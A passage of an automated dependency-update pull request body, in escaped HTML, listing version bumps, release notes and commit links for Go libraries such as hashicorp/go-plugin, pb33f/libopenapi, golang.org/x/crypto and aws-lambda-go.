href=\"https://github.com/hashicorp/go-plugin/commit/92fb14e530db1a4d6d1053adb0f823155f52165d\"\u003e\u003ccode\u003e92fb14e\u003c/code\u003e\u003c/a\u003e update changelog for v1.7.0 (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/356\"\u003e#356\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/d2a064ec63aa639d29c3d7b64a50776d42982c29\"\u003e\u003ccode\u003ed2a064e\u003c/code\u003e\u003c/a\u003e Complete the implementation of moving panics to the Error log level (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/353\"\u003e#353\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/b02adb3fdfefea44ec04ee09074fcc93a42e6302\"\u003e\u003ccode\u003eb02adb3\u003c/code\u003e\u003c/a\u003e Spend less time preparing to write log lines when the logger is disabled (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/352\"\u003e#352\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/a938e9a3385168c366e944d3c16a95a9a9b03d31\"\u003e\u003ccode\u003ea938e9a\u003c/code\u003e\u003c/a\u003e [Compliance] - PR Template Changes Required (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/350\"\u003e#350\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/f4acdfe4f62c0daa216fc951a525ae578daadcae\"\u003e\u003ccode\u003ef4acdfe\u003c/code\u003e\u003c/a\u003e Bump protobuf from 4.24.4 to 4.25.8 in /examples/grpc/plugin-python (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/348\"\u003e#348\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/ba61a6548317254b855e92042150362cd17c7e0c\"\u003e\u003ccode\u003eba61a65\u003c/code\u003e\u003c/a\u003e [chore] : Bump the go group across 2 directories with 7 updates (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/346\"\u003e#346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/64b8d7614c8e0753ad794817a0b034a976bfa97f\"\u003e\u003ccode\u003e64b8d76\u003c/code\u003e\u003c/a\u003e fix additional lint issues and expand linter scope (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/344\"\u003e#344\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/810097c69630b52c15e7ae5e128142069298ab1e\"\u003e\u003ccode\u003e810097c\u003c/code\u003e\u003c/a\u003e [chore] : Bump golang.org/x/net (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/347\"\u003e#347\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/c882484d2f5f3e97a56651924ae0f26e2f84ad74\"\u003e\u003ccode\u003ec882484\u003c/code\u003e\u003c/a\u003e [chore] : Bump the actions group with 3 updates (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/345\"\u003e#345\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/21b9619042fccc8b03bd6fe97a977a77f74ca163\"\u003e\u003ccode\u003e21b9619\u003c/code\u003e\u003c/a\u003e IND-3869 enabling dependabot (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/343\"\u003e#343\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/hashicorp/go-plugin/compare/v1.6.3...v1.7.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/pb33f/libopenapi` from 0.22.3 to 0.35.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pb33f/libopenapi/releases\"\u003egithub.com/pb33f/libopenapi's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.35.1\u003c/h2\u003e\n\u003cp\u003eA big refactor of the low-level model, after years of growth and organic changes. runs faster and cooler now, fewer allocations, less memory, and less number crunching. runs fewer instructions faster, all for \u003cstrong\u003efree.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eAlso fixes a bundling glitch that was keeping old references in play in the model after composed bundling.\u003c/p\u003e\n\u003cp\u003eNo breaking changes, no new features.\u003c/p\u003e\n\u003ch2\u003ev0.35.0\u003c/h2\u003e\n\u003cp\u003eThe release fixes an issue where \u003ccode\u003e$id\u003c/code\u003e was being parsed when inside examples. The index module was also heavily refactored to make it easier to read, operate, and understand, a huge cleanup of years of organic growth. Much more to come.\u003c/p\u003e\n\u003cp\u003eNo breaking changes, no new features, 7% more efficient.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/luke-hagar-sp\"\u003e\u003ccode\u003e@​luke-hagar-sp\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.34.4\u003c/h2\u003e\n\u003cp\u003eFixes security issues and patches issues \u003ca href=\"https://redirect.github.com/pb33f/libopenapi/issues/545\"\u003e#545\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/zhirschtritt\"\u003e\u003ccode\u003e@​zhirschtritt\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.34.3\u003c/h2\u003e\n\u003cp\u003eAddresses \u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/143\"\u003epb33f/wiretap#143\u003c/a\u003e by adding reusable local reference-resolution helpers and ensuring that nested-reference context settings are consistently propagated from document-level config into index/resolver config.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/andreyyudin\"\u003e\u003ccode\u003e@​andreyyudin\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.34.2\u003c/h2\u003e\n\u003cp\u003eFixes issue \u003ca href=\"https://redirect.github.com/daveshanley/vacuum/issues/821\"\u003edaveshanley/vacuum#821\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.34.1\u003c/h2\u003e\n\u003cp\u003eMinor bugfix for vacuum and some multi-file lookup edge cases, no new features, no breaking changes.\u003c/p\u003e\n\u003ch2\u003ev0.34.0\u003c/h2\u003e\n\u003ch2\u003eAdds support for \u003ca href=\"https://spec.openapis.org/arazzo/latest.html\"\u003eArazzo\u003c/a\u003e\u003c/h2\u003e\n\u003cp\u003eDocs \u003ca href=\"https://pb33f.io/libopenapi/arazzo/\"\u003ehttps://pb33f.io/libopenapi/arazzo/\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eConfigurable JSONPath lookup\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pb33f/libopenapi/pull/535\"\u003epb33f/libopenapi#535\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eUpdates JSONPath lookup in utils to be configuration-aware and safe with recent \u003ca href=\"https://github.com/pb33f/jsonpath\"\u003ehttps://github.com/pb33f/jsonpath\u003c/a\u003e behavior, especially with respect to WithLazyContextTracking().\u003c/p\u003e\n\u003cp\u003eDifferent lookup scenarios need different execution behavior and safety constraints. This keeps existing behavior by default while allowing explicit control and preventing incorrect cache reuse across different JSONPath engine settings.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/andreyyudin\"\u003e\u003ccode\u003e@​andreyyudin\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://redirect.github.com/pb33f/libopenapi/issues/533\"\u003epb33f/libopenapi#533\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eNew \u003ccode\u003eCreateSchemaProxyRefWithSchema(ref string, schema *Schema)\u003c/code\u003e introduced\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix goroutine leak in schema\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/badb17a26aaf89190194e2fbdb1590b08ef25328\"\u003e\u003ccode\u003ebadb17a\u003c/code\u003e\u003c/a\u003e bumping coverage\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/85682e1e48ed2be8cac175ce7ced4f2946c9cf5a\"\u003e\u003ccode\u003e85682e1\u003c/code\u003e\u003c/a\u003e fixing nil checks and borked pipeline.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/cda65e2d632670e0af023c1aa34945f935ec991c\"\u003e\u003ccode\u003ecda65e2\u003c/code\u003e\u003c/a\u003e more model refactoring and cleanup.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/10828caacd4b3253ba2fa9fb4ef930d9eaccdd07\"\u003e\u003ccode\u003e10828ca\u003c/code\u003e\u003c/a\u003e working through model performance refactor\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/af72cd2a52fae2f3b16ca9f570f646cb6fc82afd\"\u003e\u003ccode\u003eaf72cd2\u003c/code\u003e\u003c/a\u003e refactoring schema performance and clarity\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/65096b4e066d33bd3c9b5d5d4cbf772d584063a5\"\u003e\u003ccode\u003e65096b4\u003c/code\u003e\u003c/a\u003e fix stale references being returned after bundling\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/da443c119275140cde89930b81b855d927fbf2b1\"\u003e\u003ccode\u003eda443c1\u003c/code\u003e\u003c/a\u003e rebased and ported luke's work\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/2d7f1c67e45831d6d9ac9233f60a07a1cd128a67\"\u003e\u003ccode\u003e2d7f1c6\u003c/code\u003e\u003c/a\u003e address coverage issues\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/c85f4e8951d7197b96c51ac899c435489050a62e\"\u003e\u003ccode\u003ec85f4e8\u003c/code\u003e\u003c/a\u003e OH WINDOWS. PLEASE. STOP BEING STRANGE\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/660a62f9fccd506c4d3712adfa005ee4e50e6d46\"\u003e\u003ccode\u003e660a62f\u003c/code\u003e\u003c/a\u003e fixing windows issues.\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pb33f/libopenapi/compare/v0.22.3...v0.35.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/pb33f/libopenapi-validator` from 0.4.7 to 0.13.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pb33f/libopenapi-validator/releases\"\u003egithub.com/pb33f/libopenapi-validator's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.13.3\u003c/h2\u003e\n\u003cp\u003eFixes \u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/issues/27\"\u003e#27\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eAnd fixes \u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/134\"\u003epb33f/wiretap#134\u003c/a\u003e fully\u003c/p\u003e\n\u003ch2\u003ev0.13.2\u003c/h2\u003e\n\u003cp\u003eFixes issues in wiretap\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/91\"\u003epb33f/wiretap#91\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/146\"\u003epb33f/wiretap#146\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/147\"\u003epb33f/wiretap#147\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eand issues\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/issues/191\"\u003e#191\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.13.1\u003c/h2\u003e\n\u003cp\u003eAdds support for passing compiled schemas for document validation. Prevents another compilation step, saving on compute and memory.\u003c/p\u003e\n\u003cp\u003eNo breaking changes.\u003c/p\u003e\n\u003ch2\u003ev0.13.0\u003c/h2\u003e\n\u003cp\u003eRefactored \u003ccode\u003eSchemaValidationFailure \u003c/code\u003estruct fields.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eThis is a breaking change,\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/pull/188\"\u003epb33f/libopenapi-validator#188\u003c/a\u003e\n\u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/pull/200\"\u003epb33f/libopenapi-validator#200\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/mjbonifacio\"\u003e\u003ccode\u003e@​mjbonifacio\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eAlso implemented a RadixTree design to speed up path lookup.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/pull/217\"\u003epb33f/libopenapi-validator#217\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/its-hammer-time\"\u003e\u003ccode\u003e@​its-hammer-time\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.12.1\u003c/h2\u003e\n\u003cp\u003eAdds support for all authentication types.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/x-delfino\"\u003e\u003ccode\u003e@​x-delfino\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.12.0\u003c/h2\u003e\n\u003cp\u003eAdds XML body validation with the addition of \u003ccode\u003eAllowXMLBodyValidation\u003c/code\u003e as a configuration option. Also adds support for \u003ccode\u003ex-www-form-urlencoded\u003c/code\u003e validation.\u003c/p\u003e\n\u003cp\u003eNo breaking changes.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/ySnoopyDogy\"\u003e\u003ccode\u003e@​ySnoopyDogy\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/1151bc5b91c4862406d096b628d43408f8f48237\"\u003e\u003ccode\u003e1151bc5\u003c/code\u003e\u003c/a\u003e Address \u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/issues/27\"\u003e#27\u003c/a\u003e fully\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/04d2b62899469b2510c63b144204b7e6d6e0dbce\"\u003e\u003ccode\u003e04d2b62\u003c/code\u003e\u003c/a\u003e fully address \u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/134\"\u003epb33f/wiretap#134\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/881f8cbbc7629f6e03c1449d402cbbda1e1f6c58\"\u003e\u003ccode\u003e881f8cb\u003c/code\u003e\u003c/a\u003e cleanup\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/1e37fc1d278e0f32bf5eaa70751414b07cd3f99d\"\u003e\u003ccode\u003e1e37fc1\u003c/code\u003e\u003c/a\u003e address \u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/issues/191\"\u003e#191\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/07b06ebb04115eb7eb60e78c618572deab5edfd9\"\u003e\u003ccode\u003e07b06eb\u003c/code\u003e\u003c/a\u003e upodated test to be more useful\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/39485c117b6df302dd377572da0db7812a9f7d96\"\u003e\u003ccode\u003e39485c1\u003c/code\u003e\u003c/a\u003e Address \u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/issues/247\"\u003epb33f/libopenapi-validator#247\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/39db7ef1bc65feb98a2c75589e37d811fcbc3d44\"\u003e\u003ccode\u003e39db7ef\u003c/code\u003e\u003c/a\u003e address \u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/91\"\u003epb33f/wiretap#91\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/04189e533b6d6bcdb63c0752fd6a35530a0bd322\"\u003e\u003ccode\u003e04189e5\u003c/code\u003e\u003c/a\u003e address issue \u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/146\"\u003epb33f/wiretap#146\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/ce277214ae87e91a8a5d21163811dd75ba91b336\"\u003e\u003ccode\u003ece27721\u003c/code\u003e\u003c/a\u003e Addressing  \u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/147\"\u003epb33f/wiretap#147\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/16cd936076a92c4f23aa5975f3a3d2bce2501efd\"\u003e\u003ccode\u003e16cd936\u003c/code\u003e\u003c/a\u003e bump that coverage!\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pb33f/libopenapi-validator/compare/v0.4.7...v0.13.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `golang.org/x/crypto` from 0.41.0 to 0.48.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/e08b06753d6a72f1fe375b6e0fefefb39917c165\"\u003e\u003ccode\u003ee08b067\u003c/code\u003e\u003c/a\u003e go.mod: update golang.org/x dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/7d0074ccc6f17acbf2ebb10db06d492e08f887dc\"\u003e\u003ccode\u003e7d0074c\u003c/code\u003e\u003c/a\u003e scrypt: fix panic on parameters \u0026lt;= 0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/506e022208b864bc3c9c4a416fe56be75d10ad24\"\u003e\u003ccode\u003e506e022\u003c/code\u003e\u003c/a\u003e go.mod: update golang.org/x dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/7dacc380ba001e8fe7c3c7a46bf3cbdaa5064df9\"\u003e\u003ccode\u003e7dacc38\u003c/code\u003e\u003c/a\u003e chacha20poly1305: error out in fips140=only mode\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/19acf81bd7bc7b558d18a550e8e023df2c33e742\"\u003e\u003ccode\u003e19acf81\u003c/code\u003e\u003c/a\u003e go.mod: update golang.org/x dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/3a1c6b4b61966d06b6469ad7bc15839ba76eeb89\"\u003e\u003ccode\u003e3a1c6b4\u003c/code\u003e\u003c/a\u003e x509roots/fallback: update bundle\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/f4602e40409257658159002a9af6aedb875949fb\"\u003e\u003ccode\u003ef4602e4\u003c/code\u003e\u003c/a\u003e ssh/agent: fix flaky test by ensuring a writeable home directory\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/4e0068c0098be10d7025c99ab7c50ce454c1f0f9\"\u003e\u003ccode\u003e4e0068c\u003c/code\u003e\u003c/a\u003e go.mod: update golang.org/x dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/e79546e28b85ea53dd37afe1c4102746ef553b9c\"\u003e\u003ccode\u003ee79546e\u003c/code\u003e\u003c/a\u003e ssh: curb GSSAPI DoS risk by limiting number of specified OIDs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/f91f7a7c31bf90b39c1de895ad116a2bacc88748\"\u003e\u003ccode\u003ef91f7a7\u003c/code\u003e\u003c/a\u003e ssh/agent: prevent panic on malformed constraint\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/golang/crypto/compare/v0.41.0...v0.48.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `google.golang.org/protobuf` from 1.36.1 to 1.36.6\n\nUpdates `github.com/aws/aws-lambda-go` from 1.49.0 to 1.54.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-lambda-go/releases\"\u003egithub.com/aws/aws-lambda-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.54.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAllow ClientContext.Custom unmarshaling for non-string (JSON) values by \u003ca href=\"https://github.com/M-Elsaeed\"\u003e\u003ccode\u003e@​M-Elsaeed\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/620\"\u003eaws/aws-lambda-go#620\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/M-Elsaeed\"\u003e\u003ccode\u003e@​M-Elsaeed\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/620\"\u003eaws/aws-lambda-go#620\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.54.0...v1.53.0\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.54.0...v1.53.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.53.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd S3 event optional fields by \u003ca href=\"https://github.com/yhamano0312\"\u003e\u003ccode\u003e@​yhamano0312\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/612\"\u003eaws/aws-lambda-go#612\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate workflows for go 1.26 by \u003ca href=\"https://github.com/bmoffatt\"\u003e\u003ccode\u003e@​bmoffatt\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/617\"\u003eaws/aws-lambda-go#617\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix spelling typos by \u003ca href=\"https://github.com/magnetikonline\"\u003e\u003ccode\u003e@​magnetikonline\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/616\"\u003eaws/aws-lambda-go#616\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for Cognito Inbound federation Lambda trigger by \u003ca href=\"https://github.com/maximrub\"\u003e\u003ccode\u003e@​maximrub\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/619\"\u003eaws/aws-lambda-go#619\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yhamano0312\"\u003e\u003ccode\u003e@​yhamano0312\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/612\"\u003eaws/aws-lambda-go#612\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/magnetikonline\"\u003e\u003ccode\u003e@​magnetikonline\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/616\"\u003eaws/aws-lambda-go#616\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/maximrub\"\u003e\u003ccode\u003e@​maximrub\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/619\"\u003eaws/aws-lambda-go#619\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.53.0...v1.52.0\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.53.0...v1.52.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.52.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003elambdacontext\u003c/code\u003e feature: Adding structured logging helper by \u003ca href=\"https://github.com/anzheyazzz\"\u003e\u003ccode\u003e@​anzheyazzz\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/614\"\u003eaws/aws-lambda-go#614\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anzheyazzz\"\u003e\u003ccode\u003e@​anzheyazzz\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/614\"\u003eaws/aws-lambda-go#614\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.51.2...v1.52.0\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.51.2...v1.52.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.51.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: always return PhysicalResourceID for CFn CustomResources by \u003ca href=\"https://github.com/Youssef-Beltagy\"\u003e\u003ccode\u003e@​Youssef-Beltagy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/613\"\u003eaws/aws-lambda-go#613\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Youssef-Beltagy\"\u003e\u003ccode\u003e@​Youssef-Beltagy\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/613\"\u003eaws/aws-lambda-go#613\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.51.1...v1.51.2\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.51.1...v1.51.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.51.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003edocumentation rework by \u003ca href=\"https://github.com/bmoffatt\"\u003e\u003ccode\u003e@​bmoffatt\u003c/code\u003e\u003c/a\u003e in \u003ca 